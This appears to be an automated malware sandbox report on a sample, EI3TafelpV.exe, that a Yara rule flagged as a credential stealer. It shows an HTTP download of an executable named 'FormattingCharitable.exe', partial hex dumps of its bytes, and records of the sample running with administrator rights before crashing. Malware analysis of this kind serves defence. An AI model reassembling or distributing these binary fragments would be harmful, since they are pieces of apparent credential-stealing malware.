                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                                      Content-Length: 1325507
                                                                                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                                                                                                                                      Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                                                                                                                                      Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                                                                                                                                      Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                                                                                                                                      Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                                                                                                                                      Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC10749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                                                                                                                                      Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                                                                                                                                                      Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                                                                                                                                                      Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC16384INData Raw: c3 00 98 82 8f bc e1 08 b4 34 91 5b 90 27 10 fb 22 e6 12 e3 97 82 2e da 0e 91 3c 82 71 e4 17 03 95 77 78 9e 9e 83 24 2f b5 15 33 9f c9 77 c9 77 66 de 33 a7 0b ba 68 03 c9 9f 66 1e 95 ef 66 9e 35 bf 0b 8e f2 33 c0 77 1c 17 3c eb 1f e7 f2 75 61 97 71 e8 84 ce ea d5 ab 1b c1 7c f4 12 e0 42 40 3c 0b 00 eb 44 19 e2 18 2f 5f be 9c a6 4e 9d aa 0c c0 73 cf 3d f7 af 6d 00 c6 8c d9 70 f7 a8 51 ce 7d 46 0d 75 ea 39 be cf 36 3c b2 f0 aa 0e 23 dd da fd 74 4c f6 4d cf 8c 48 b8 f1 d9 a7 d6 b7 bb c3 3e 19 a7 03 50 28 78 f2 e0 25 19 00 5c 9d 09 87 86 0a 80 24 82 04 84 a4 82 60 81 23 44 a0 7a b8 7b 90 97 3b 07 b5 87 17 ed f4 df 43 6b c3 37 d3 fa d0 ad e4 ea e3 46 fe 7b b9 22 b2 19 68 4c 06 fc 89 df 99 15 0c a0 12 a2 e2 4a 45 97 40 d0 83 48 0f 40 33 88 c5 04 48 b2 10 74 23
                                                                                                                                                                                                                                                                                      Data Ascii: 4['".<qwx$/3wwf3hff53w<uaq|B@<D/_Ns=mpQ}Fu96<#tLMH>P(x%\$`#Dz{;Ck7F{"hLJE@H@3Ht#


                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:00:54:14
                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\EI3TafelpV.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xd80000
                                                                                                                                                                                                                                                                                      File size:2'959'360 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:B611471D0D1A21A64700E0A8A9631761
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                      Start time:00:54:50
                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 1972
                                                                                                                                                                                                                                                                                      Imagebase:0x920000
                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                      No disassembly